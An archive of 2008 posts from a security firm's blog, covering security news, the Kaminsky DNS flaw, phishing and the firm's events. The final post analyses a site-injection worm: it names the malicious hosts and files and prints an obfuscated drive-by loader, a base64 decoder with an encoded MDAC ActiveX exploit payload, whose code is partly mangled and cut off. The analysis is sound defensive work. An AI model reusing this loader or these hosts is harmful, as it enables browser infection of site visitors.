Tuesday, December 23, 2008

Seasons Greetings

Everyone at Telspace Systems would like to wish you and your families a very happy and peaceful festive season.

Looking back on 2008, Telspace Systems had a very successful and bumper year. Early in the year, Charlie and I jet packed to Hack in the Box in Dubai where we hosted an intensive 2-day training session on Bluetooth and Wireless Hacking. During the same trip, I presented ‘Hacking the Bluetooth Stack for Fun, Fame and Mayhem’ which went off without a hitch.

Telspace Systems was a big role-player in this year’s local ITWeb Security Summit – not only did we present on “Hacking Wireless Modems” and break the story to the press, but we were involved in Johnny Long’s Hackers for Charity initiative. By Day 2 of this prestigious conference, Telspace Systems had convinced most of the delegates to do their part for the underprivileged. For those of you that are planning to attend this conference in 2009, get ready to witness a similar initiative ;)

Nearer to the end of the year, Charlie and I again set off overseas – this time to SecTor in Canada (Toronto). Again teaching delegates the art of hacking wireless and Bluetooth, we finished off the conference with a presentation on hacking internal proxies.

Finally, we have just learned that we have been chosen as a Technology Top 100 qualifier for 2009, making it the third year in a row we have been selected for this honour. 2009 holds many new training courses and great new services for our clients and we look forward to presenting these to you.

It has been an absolute pleasure working with you this year – without your continued support many of our achievements would not be possible.

Have a safe and wonderful New Year’s.

Wednesday, December 17, 2008

Dino hits the airwaves

Following his successful interview on Reuben Goldberg's The Internet Economy on Classic fM in October, Dino was contacted to discuss this weekend's Saturday Star story Hacked! on 702 Talk Radio.

He was on air at 7:40 yesterday morning and spoke to David O'Sullivan about the security of open source and ethical hacking as a business.

Dino will be interviewed on Classic fM again in January, and I will make sure to post an announcement regarding dates and times as soon as we know what they are.

Have an awesome almost-holiday week, and keep tuning in!

Wednesday, December 10, 2008

Microsoft goes out with a bang

Microsoft’s last patch for the year is a biggie – it is addressing no less than 28 security vulnerabilities.

Released yesterday, this patch solves the following issues:

• Six security holes in the ActiveX controls for Microsoft Visual Basic 6.0's Runtime Extended Files, all of which could allow remote code execution if a user visited a malicious website.
• Four memory-corruption issues in Internet Explorer
• Two other fixes addressed a total of 11 vulnerabilities in Microsoft Word and Excel
• Fixes for security issues in Microsoft's graphics library, Windows' search functionality, Windows Media Components and a vulnerability in Microsoft Office SharePoint Server.

More info is available here.

Make sure you download your updates!

Monday, December 1, 2008

Recent Facebook mail notification = FAIL

Facebook users received an email notification last week asking that email notification settings which had been 'lost' be updated - followed by an embedded link. Was this a phishing scam, or was the email legit?

Being in the industry, we know to stay away from any emails asking for personal details to be updated/confirmed/changed as it is more often than not slimy phishers looking to score. Banks even expressly state that they will never EVER under any circumstances ask for details to be updated via any email link, as they are most often targeted and the most lucrative for scammers.

Facebook has certainly not gone under miscreants' radar, given the millions of users it has. Since the Facebook explosion, warnings of phishing scams and successful attenmpts have graced news sites everywhere - and offering users the knowledge they need to distinguish fake mails from real ones.

So now - given the press and multitude of people they service, why would Facebook send all their users a mail that looks so suspiciously like a phishing one? Let's run it through a quick evaluation...



Firstly, the language they use is quite phisher-esque - "Unfortunately, the settings that control which email notifications get sent to you were lost." Uhm... lost? This statement is broad, not backed up by any reasons as to why it happened, or what the details of the problem. Besides, there was no media coverage of the technological 'glitch' or issue that caused millions of setting to be simply 'lost'.. It scores 5 phishy points on its own.

Secondly, the embedded link, which is a big no-no when it comes to getting personal details, scores another 5 points. We all know, that even though the link may look liike it points to the actual site, once clicked, it can easily redirect us to a spoofed site.

Thirdly, the signature - 'The Facebook Team' - is so impersonal. If such a serious technological error did indeed occur, I think Facebook users deserve to have someone a bit higher up with an actual name and title to send them a mail. I mean, if Facebook can 'lose' my email notification settings in some unknown and mysterious way, what is to say that next time it will not be my personal details that disappear or my photos that get wiped out? Or, God forbid, I lose my friends! I'll give that one a score of 6 just for sheer cheekiness..

Let's just say, even based on these three points alone, I would simply press delete and feel a small sense of one-upmanship by having foiled yet another potential Internet crime and never give it a second thought.


Obviously, they are trying to downplay the problem, which could be a large contributor to the way the email was written. But Facebook should know better. In my opinion, they should have bypassed the email route altogether and rather had an alert or pop-up within the application itself. If they had sent a mail to my Facebook inbox, I also would have regarded it with a lot more positive interest.

Friday, November 21, 2008

‘Tis the season of folly

December holidays are approaching, and we all know what that means… increased hacker activity as our precious youths get bored and turn to mayhem and destruction.

And to make matters worse, this time of year is always characterised by a manic rush for last-minute Christmas shopping – a lot of which is done online.

Also, with many people being on leave, companies might not have IT staff available to monitor and pick up attack behaviour.

This makes a killer combination for cybercrime instances – and we can expect to see a lot of people being duped, a lot of wesbites being defaced, and a many different malware popping up.

This year’s ‘Black Monday’ for malware is predicted for next week (November 24) – a day that is expected to be the worst of the year for computer attacks.

According to Adam Biviano, spokesman for Trend Micro, he expects to see a large increase in hackers using holiday-related tools such as electronic greeting cards as a front for attacks.

"It's typical for the orchestrators of malware attacks to make use of public holidays, make use of special occasions, because it gives them an angle from which to attract people to click on their link [or] download their attachment," he says.

Carlo Minassian, chief executive of Earthwave, says, “"It should be expected spamming and phishing will increase in the immediate future as we approach the upcoming Christmas period. Trends from past years indicate spamming and phishing spikes around this time."

So have a good weekends, guys – Monday’s set to be a scorcher ;)

Friday, November 14, 2008

South Africa prioritises cyber security

South Africa seems to be waking up nicely to the threat of cyber crime. Roy Padayachie, Deputy communications minister, spoke at a high-level security conference in Geneva recently about our commitment locally.

“Clearly an effective cyber security framework is not merely a matter of government or law enforcement practices, but has to be addressed through prevention supported by society,” he said.

He also made mention of a very important fact – that security should not be left to technology alone. “Therefore,” he stated, “priority must be given to cyber security planning and management throughout society.”

According to his speech, South Africa intends to strengthen collaboration and partnerships at the national level through the establishment of a government-industry collaboration forum.

He said “Cyber threats or attacks do not recognise borders or laws; therefore, governments, business and civil society globally should work together to protect and secure their national cyber space and critical infrastructure. Governments throughout the world are not able to deal with the emerging threat on their own.”

This is great news for the country. As the 2010 World Cup draws eerily near, South Africa can expect to become a very lucrative target for cyber criminals, and it is best to have as many security measures in place as soon as possible. The many attacks populated near, during and after this year’s Olympics are a perfect example of how criminals take advantage of world events.

More on Padayachi’s speech can be found on ITWeb.

Thursday, October 30, 2008

Cybercrime rises as markets fall

Recent data published by Panda Security shows a direct correlation between the instability of the stock market and a dramatic rise in cyber crime.

According to Jeremy Matthews, head of Panda Security’s sub-Saharan operations “When we began looking into the specific effects cyber-criminals had on the economy during times of duress we found a startling connection: the criminal economy is closely interrelated with the global economy.”

He says that based on extensive research and analysis done by Panda of emerging malware patterns, they believe that criminal organisations are closely watching market performance and adapting as needed to ensure maximum profit.

Some of the key findings include:
• On average, the US stock market experienced between a 3 to 7 percent decline from Sep 1 to Oct 9. However, activity on the “malware markets” was the opposite: it grew substantially as the stock markets declined.
• From Sep 5 to 16, the Dow Jones Industrial Average, NASDAQ, S&P 500 and Composite Index all dropped from the plus 0.0 percent range to approximately negative 3.0 percent or lower. In the same period the Spanish IBEX 35 index and the London FTSE 100 also suffered major losses. The same timeframe witnessed a significant surge in daily malware threats; for example from Sept. 8th to Sept 10th the volume of daily threats grew from 10 150 to well over 24 000.
• From Sep 14 to 16, stock markets dropped from -0.5 to -5.5 percent while daily threats grew 50 percent each day, from 8 276 on the 14 to over 31 404 on the 16th.

Panda Security has provided the following diagrams to better illustrate this correlation (please click on images for a larger version).


Fig.1 – Stock market evolutions (Sep 1 to Oct 9) – source: moneycentral.msn.com



Fig.2 – Threat evolutions with key highlights (Sep 1 to Oct 9) – source: PandaLabs


According to Panda Security, there is an increase in adware and there has been a dramatic surge of fake anti-virus software scams lately. Now is the time to be more vigilant and more suspicious than ever before. It is evident that cybercriminals will stop at nothing to get your money, especially in desperate situations. Please be careful!

Friday, October 24, 2008

Microsoft’s emergency and Google’s malware

This was a pretty bad week for the big guys as Microsoft and Google both came under a negative spotlight.

Microsoft had to release an emergency patch for a certain vulnerability that allows an internet worm to spread and makes remote execution possible.

It has been flagged as critical for users of Windows 2000, XP and Server 2003 and "important" for Windows Server 2008 and Windows Vista users.

Google was an inadvertent malware distributor for three infected sites, namely xlovelygirls.com, paincult.com, and iteenzy.com.

Local events
There are a couple of security-related events coming up locally for those that may be interested:

Cyber Crime Africa Summit
Hotel Apollo, Johannesburg
10-12 November

Practicing Innovation in Digital Forensics Management
Balalaika Hotel, Johannesburg
12-13 November

Security Africa Summit 2008
Balalaika Hotel, Johannesburg
26-28 November

Last but not least
Telspace is hotting up the media this week! You can catch a glimpse of the lesser-spotted Charlie on ITWeb’s Security Week newsletter today, and catch Dino C on Classic FM talking about cybercrime later tonight. Tune in to 102.7fm between 7 and 8pm!

Tuesday, October 14, 2008

SecTor 2008

This year’s SecTor was simply amazing and had a great turn out. It featured a number of great talks by presenters such as Johnny Long who discussed “no-tech hacking” and HD Moore on "MetaSploit Prime". Everything was extremely well organised by the very accommodating SecTor team.

Our training went great, and we would like to thank everyone who attended our training and for their feedback. Last but not least, a huge thanks to Brad 'RenderMan' Haines for helping out with the training!

Wireless hacking gets more interesting…

Russian hackers have discovered a mode to accelerate Wi-Fi decryption by using an NVIDIA graphics card, although no one seems to be clear which one is being used.

Apparently, it cracks passwords much faster than the usual methods. Although some sources cite that these type of new hacking techniques focused on wireless technology could see a move back to a wired network connections, I sincerely doubt that.

The nature of the technological advancement beast ensures that we are always moving in a forward direction – and never backwards. Besides, people tend to ignore security issues where convenience plays a factor.

In any case, suggestions are being made to apply tighter VPN controls, so you can always start there.

If anyone is interested in learn more about wireless hacking, you can contact me on [email protected] for more details on Telspace’s Bluetooth and Wireless 101 training.

Tuesday, September 30, 2008

Crime and punishment

Things have pretty quiet locally, it seems – on the news front at least. A few bits of good news from overseas, though.

The UK has issued an update to its Computer Misuse Act. First off, the maximum penalty for unauthorised access to a computer system has been changed from six months to two years imprisonment. Here’s to hoping that will deter would-be criminals even further.

Also, denial of service attacks (DoS) have been declared a criminal offence – with miscreants looking at up to ten years in prison – so you better off gaining unlawful access ;-P.

Finally, distributing hacking tools for criminal intent has been declared a punishable offense. I am quite surprised it wasn’t already!

On that note, the US has just passed a bill that significantly increases the penalties relating to copyright infringement, although there has been major debate about it already.

Gartner says


A recent presentation from a Gartner executive brought up the issue about mobile security. Although his statements are nothing new, John Girard, a Gartner vice president is again reminding organisations that security risks are rising as smartphones become even smarter.

He did have some very good advice, though, “Data on devices should be encrypted, proper identity and access controls should be implemented and intrusion prevention systems should used to ensure that rogue devices don't access sensitive information,” he said.

He also told delegates at the IT Security Summit in London yesterday that Gartner is predicting that wireless ID theft and phishing attempts targeting mobile devices will become more and more prevalent throughout next year.

Friday, September 19, 2008

Be proactive – or walk the plank

Some of the latest research released by Frost & Sullivan shows that the security assessment industry is doing pretty hot. According to a recent article on ITWeb, the global vulnerability assessment products market earned revenue of $297.5 million in 2007, and estimates this to more than triple by 2014.

Although this is good news for the security industry and just about everyone else who has private information floating around on other people’s networks, we find that South Africa is still meeting all this with a bit of resistance. Why, though?

The answer is quite a simple one – assessments are becoming a regulatory requirement from many countries’ governments. And this simply does not apply to us here in deep south of Africa…. Well, as of yet, at least.

There is a wonderful thing called the Protection of Personal Information Bill that will make a big difference in all of our privacy once it is passed as an Act. And companies are actually being advised to prepare for it properly now – because it will come into effect in the next few years.

The way it will influence the security assessment industry locally, for instance, is by forcing companies to not only ensure that all their client data is under the virtual version of Fort Knox, but that they have regular assessments done. As in, on a regular basis. Forever and ever.

However, this does not mean that companies can just relax in the mean time and wait for the Act to be born. Companies need to be proactive about this – those of you that take the initiative NOW to secure your corporate environment and to set up regular audits, will be way ahead of your competitors when the Act comes into effect. And possibly even avoid a jail sentence.

As soon as it becomes law, companies might not even be granted a grace period to ensure their security policies and procedures are in place, either. This means, they may be treading on illegal ground from day zero.

And don’t think you can easily pass under the radar – the Act will have its very own Big Brother in the form of a dedicated Commission. And although a set fine has not yet been established, you can look at about 12 months if you’re not properly prepared. And, if you hinder, obstruct or unduly influence the Commission, you can land yourself in jail for 10 years.

Have an awesome weekend – and ponder on it will ya! :-)

Tuesday, September 16, 2008

OMG, Telspace goes to Canada

Just a short blog post to let everyone know that Telspace Systems will be presenting at SecTor in Canada during early October 2008. Our talk will be based on hacking internal proxy servers, more details can be read up at www.sector.ca

Telspace Systems is also going to be doing training at SecTor this year. Focusing on Bluetooth and Wireless hacking. Our course already has many students signed up, so we would appreciate it if you booked as soon as possible to miss out on the opportunity! It's going to be fantastic.

We are really looking forward to this awesome event again. If you are from anywhere near the region or you are attending SecTor, pop in and say hi!



P.S Telspace Systems is hiring again, so give us a call if you think you have what it takes.

Friday, September 12, 2008

Zombie networks go bos

There has been a dramatic increase in the number of zombie networks cropping up lately. Recent metrics by the Shadowserver Foundation shows that in the last three months botnet numbers have quadrupled. Although strangely enough, there seems to be no accompanying increase in spam levels.

According to BBC News, "In June 2008 Shadowserver Foundation knew about more than 100,000 machines that were part of a botnet. By the end of August this figure had exceeded 450,000 machines."

Reason for this hectic spike are not clear, but there are many theories floating around the net. According to the SANS Internet Storm Centre, it may be more than a co-incidence that the dramatic rise in these networks is more or less parallel with the massive SQL injection attacks we experienced recently.

It is also being said that because it happened during schools holidays in the USA, it could just be due to bored kids. Maybe all the cool kids are doing it... but more than likely it is due to a combination of factors, rather than a specific one.

Whatever the reason behind the huge swell of compromised machines, users should more than ever before be vigilant with their security. Patch, patch, patch, and don't click on weird stuff... it can never be stressed enough.

Also, just a quick mention that our Hands on Hacking Unlimited course with Zone-h has been postponed until the 11th and 12th of November. If you have not yet sent in a booking form, please do so – it's gonna be awesome.

Monday, September 8, 2008

MySQL and SQL Column Truncation Vulnerabilities

I've found a really interesting blog post this morning by Stefan Esser discussing a problem he calls 'MySQL and SQL Column Truncation Vulnerabilities'. This vulnerability takes advantage of the max_packet_size configuration by placing a large number of spaces and then a random character after the spaces. This basically allows an attacker to add "duplicate" entries to your database.

As you can image this would bring around pretty big issues with services like user registration. You can read his excellent post for a good breakdown of this vulnerability here.

This morning the first exploit for this kind of vulnerability in a web application was also released. This affects the latest version of Wordpress.

Thursday, September 4, 2008

ISGA meeting in Bryanston

The turn-out of today’s Information Security Group of Africa (ISGA) meeting at the Cisco Offices in Bryanston was really impressive.

Numerous information security role-players from many different companies (including Discovery, BCX, RSA, Deloitte, and Investec) convened to hear what their peers had to say about the industry.

On the ISGA front, Karel Rode, acting chairman, showed the crowd a slide of the ISGA website’s new look. “We will be displaying security-related live content from various sources onto the homepage,” he said.

The first talker of the day was Dion Fowles from Alexander Forbes who spoke extensively about the new Protection of Personal Information (PPI) Bill and what its impact will be on the corporate environment. He outlined and discussed the Bill’s eight principles, specifically Principle 6 (security safeguards) which is the only principle that deals with IT-related issues.

He took a layman’s approach to explaining the Bill and used his psychology background to make the presentation not only enjoyable, but understandable. All in all, a great presentation.

Mike Silber from Michalson’s Attorneys focused his speech around more ‘fast-tracked’ Bills. He believes that the PPI bill will be put on hold until the next elections.

He attempted to demystify the Companies Bill, the Competition Amendment Bill and the Consumer Protection Bill, which he sees as the mother of all Bills – complicated at best.

It was clear from both Fowles’ and Silber’s presentations, however, that it is a very lucrative time to be in the information security service busines. Once more of these Bills are passed, network breaches and compromised client data will have to be publicly disclosed and even announced through the media.

After the initial break, Jacques van Heerden from GTSP spoke to the audience about virtualisation. He mostly spoke about virtualisation in general – its definition, what a hypervisor is, where to start, pros and cons, although he did touch briefly upon how to handle your security if you plan on rolling out virtualisation.

He mentioned VMWare quite frequently during his talk, particularly pointing out how good their products are. What he did fail to mention, however, was a recent security vulnerability that was reported on milw0rm that exploits an ActiveX method in VMWare.

Finally, Peet Smith from Aptronics discussed security governance in IT. He believes that IT governance is currently maturing as there is a high awareness among corporates. Some of the keys drivers of this include legislation as well as customer requirements.

Well done and thank you to Karel and the Cisco guys for a great opportunity to network and learn. Looking forward to the next one!

Thursday, August 14, 2008

DNS still exploitable

Well for those of you who don't know it is still possible to poison the latest BIND patch with fully randomized ports. All that's required according to A Russian physicist, is a fast enough line, 2 computers and 10 hours of your time. He said "Attack took about half of the day, i.e. a bit less than 10 hours. So, if you have a GigE lan, any trojaned machine can poison your DNS during one night...". He released a post on his blog showing how he did it. The exploit is now also available from his blog and other websites distributing exploits: http://tservice.net.ru/~s0mbre/archive/dns/

When commenting on a New York Times article that discusses his findings, he said "Article says, that DJBDNS does not suffer from this attack. It does. Everyone does. With some tweaks it can take longer than BIND, but overall problem is there."

In other news Telspace systems will be presenting and providing wireless and Bluetooth training this year at the exceptional and must attend event Sector in Toronto, Canada.

Friday, August 8, 2008

Phishers target Google Lively

Google's new social networking platform is under attack.

Google recently deployed its own social networking platform, called Google Lively, which has come under the phisher's radar.

Google Lively, currently in Beta stage, is similar to another application called Second Life, by Linden Labs. Lively is even being referred to as the “Second Life killer”.

Google Lively users can embed the application into their Web sites using Google widgets, just as YouTube videos can be embedded into a blog, MySpace or Facebook account. From there they can create their own “room” for site visitors to chat/socialise in. Google Lively allows for customisable characters and personal rooms.

The problem comes in when users have to authenticate themselves to the application, you can literally log in to Google Lively from a completely anonymous site hosting the content.

As you can imagine, this brings about serious issues; an attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.

Similar to a phishing attack, the user will be tricked into giving over their confidential information. It seems possible that the application may intercept the information and then forward the login details to the legitimate application, so from here the user wouldn't even know their account details have been stolen. The end-user would be clueless to what has just taken place.

The application download is a mere 469Kb file. From there the application will initialise and install.

Due to the fact that there was much hype about hacking Second Life, such as Michael Thumann's excellent talk on hacking Second Life, this definitely makes us think we will see a lot of interest in 'hacking' Google Lively.

Not to mention the amount of information that can be acquired through utilising the application for, let's say, ‘interesting' purposes.

It is highly recommended that a separate Google account be used for Google Lively activity. This would minimise risk, simply because if a password is stolen, the potential damage will be minimal to the end-user.

In addition to using a separate account, it advised that South African users watch out for illegitimate Web sites, e-mails and links specifically pertaining to Google Lively.

An attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.
Google is concerned about security and has obviously drafted up several Web sites providing users with information on several attacks.

They have said the following in response to the security speculation: “Sadly, phishing schemes and other malicious attempts to steal identities are rampant on the Web today. Lively is always working to improve site security and warns users of phishing attempts, but we feel that the Google Accounts system is safe and secure. Always be cautious when entering any username and password that you may have - being aware is your best protection!”

Google has also provided a few safety tips on how not to fall victim to these attacks. These include advising users to be on the lookout for “phishy” e-mails, which contain generic greetings like "Attention Lively Member" or "Dear lucky user", targeted specifically for room owners (ie, "We're conducting a survey of Lively room creators...").

These may contain links to Web sites that look exactly like lively sign-in pages. They have also described several techniques and methodologies to subscribers that hackers would utilise, such as forged “From” headers in the e-mail.

Judging by the amount of people that still fall victim to phishing attacks, more needs to be done than telling users to check for forged headers. More can be read from here: http://www.lively.com/help/bin/answer.py?answer=98980&topic=15053 .

With more local users utilising Google services, it is more than just the fact that you can login to Google Lively from any anonymous Web site. There are several very important aspects to be concerned about in terms of the potential damage that could be caused. This definitely leaves a great amount of worries and concerns for the end-user. We can definitely expect to see some sort of attack against Google Lively in the not too distant future.

Thursday, August 7, 2008

Dan Kaminsky's Blackhat presentation packs room

Black Hat had its hands full when Dan Kaminsky took the stage this year in Las Vegas. Dan's talk pulled around 1000 Black Hat attendees. Despite the fact that information about the vulnerability was released before hand. With the room overflowing and people even sitting on the floor to catch Dan's talk about the much publicised DNS flaws that could change the internet.

Surprisingly Dan's DNS findings won him a Pwnie award for most over hyped bug. In Dan's talk he spoke about his findings and the potential threats that could have come about. Dan has also uploaded a summary of his talk to his site. And we even have a cool time line video:



Wednesday, July 23, 2008

DNS vulnerability uncovered?

It appears someone has rediscovered Dan Kaminsky's DNS vulnerability. Security researcher Halvar Flake, has posted a hypotheses of his findings on his blog. While this hasn't been confirmed to be the same issue, security researchers are saying it is indeed. we sure hope it is. Dan declined to confirm if it is the same vulnerability.

Matasano, one of the companies briefed about Dan's findings have leaked some information on their site, it was soon removed but is now mirrored on other sites for our reading pleasure. And according to Dave Aitel, chief technology officer at security vendor Immunity, hackers are almost certainly already developing attack code for the bug, and will most likely appear within the next few days.

Did anyone really expect this to be kept under wraps until Blackhat next month?

Thursday, July 17, 2008

DNS Goes Bad

There has been an enormous amount of concern on the Internet after the recent announcement that a severe issue has been discovered affecting almost all DNS servers.

The researcher and security guru credited for finding the vulnerability is Dan Kaminsky. He found the issue around six months ago, by complete accident.

We can all be grateful that Kaminsky responsibly disclosed this specific issue, as this vulnerability could have had severe consequences and ultimately he would have been able to obtain a hefty amount of money from the right (and wrong) people. In his words: "DNS goes bad, every Web site goes bad, and every e-mail goes... somewhere."

This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.

Giants in the IT industry came together in March 2008 at Microsoft's campus in Redmond, Washington, where they engaged in secretive research to address the issue and come up with patches that could be released simultaneously by multiple vendors.

The meetings included Microsoft, Cisco, Sun and as well as the Internet Systems Consortium (ISC), creator of BIND (the most commonly used DNS server on the Internet) among others, and 16 researchers including Kaminsky.

"This hasn't been done before and it is a massive undertaking," said Kaminsky.

Microsoft released a patch for this vulnerability on Tuesday, 8 July with its 'Black Tuesday' updates.

What does DNS poisoning do?

DNS translates domain names to IP addresses (those numbers you can never remember) and is at the core of many Internet services. For example, www.itweb.co.za translates to 196.30.226.221.

This specific issue, which was discovered by Kaminsky, can allow attackers to poison DNS servers cache and essentially route Internet traffic in any way they want and effectively, impersonate any site they want.

This allows for 'phishing' attacks to be far more damaging. This is because even if you have entered the address correctly into the browser, you may still end up at a fraudulent site. The list of possibilities goes on with many other protocols.

This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.
As a short description, phishing attacks can often be described as when attackers set up fraudulent Web sites to impersonate an authentic Web site. This is done to trick the user into disclosing sensitive information such as credit card numbers or banking details. Needless to say, the consequences of this attack could be severe.

We would definitely see a lot of pharming attacks. If this had to have been exploited in the wild, e-commerce and banking Web sites would have been greatest affected by the attacks.

Pharming is when a specific Web site's traffic is redirected to a bogus Web site. Many users would fall victim to this attack and not even know it. End-users would not even be aware they have provided very useful information which is harvested by the attackers. Similar to the attack in January 2005, the domain name for a large New York ISP, Panix, which was hijacked to direct to a site in Australia.

I recommend restricting access to the name server, filtering traffic, running local DNS cache, disabling recursion, and implementing source port randomisation.

I hope that the public and everyone reading any advisories pertaining to this issue will test their DNS servers and ultimately apply the relevant patches as soon as possible.

Most technical details of this vulnerability have been kept under wraps for now. This has been done to give administrators and users more time to patch their servers. Kaminsky will, however, disclose all information about the vulnerability at the BlackHat conference during August.

While many servers will automatically apply the relevant patches for this issue, a large number of servers are still vulnerable.

Those that are unsure if they are vulnerable to this issue can visit Kaminsky's Web site at http://www.doxpara.com/. From there, they will be able to see whether their name server is vulnerable. The relevant patches should be applied as soon as possible for servers that are vulnerable.

Kaminsky has said: "People should be concerned but they should not be panicking." There is still time for servers to be patched.

Kaminsky has also called on a number of security researchers to look for more issues, as he believes there still may be a number of undisclosed issues in DNS. He is also willing to let a finder of an issue come on stage with him at Defcon (2008 security conference), according to his blog.

ISC has so far encouraged DNS administrators with servers behind port-restricted firewalls to review their firewall policies to allow this protocol-compliant behavior.

Thursday, June 12, 2008

Zone-h Partnership



I am pleased to announce that Telspace Systems has officially signed a training partnership agreement with Zone-h.

This opens new doors for Zone-h in the South African region, it also allows us to market their courses locally in South Africa as exclusive partners.

We will be kicking off the first Zone-h training session on the 23rd and 24th of September 2008, with Hands-On-Hacking Unlimited. A full training schedule will be available on our website in the next week or so(you can always email us for a copy too). I strongly suggest you to attend the initial training session, as Roberto himself will be coming down to Johannesburg to present the course with us.

Tuesday, June 3, 2008

Silent Love China - Reference to sabc.co.za and reportstar.net hax

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:[email protected] email:[email protected] and the base64. Microsoft Data Access Components (MDAC) Function (MS06-014).

dj.output.base64.decode – out put of base64 – jscript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files are from iframe’s or links from src code, which were originally from http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now if we take a look at Dj.htm:

<.HTML>

<.BODY>

<.title>by shadow MSN:[email protected] email: [email protected]

<.script>

var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<<4)|((c3&0x3c)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<<6)|c4)}return>

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQ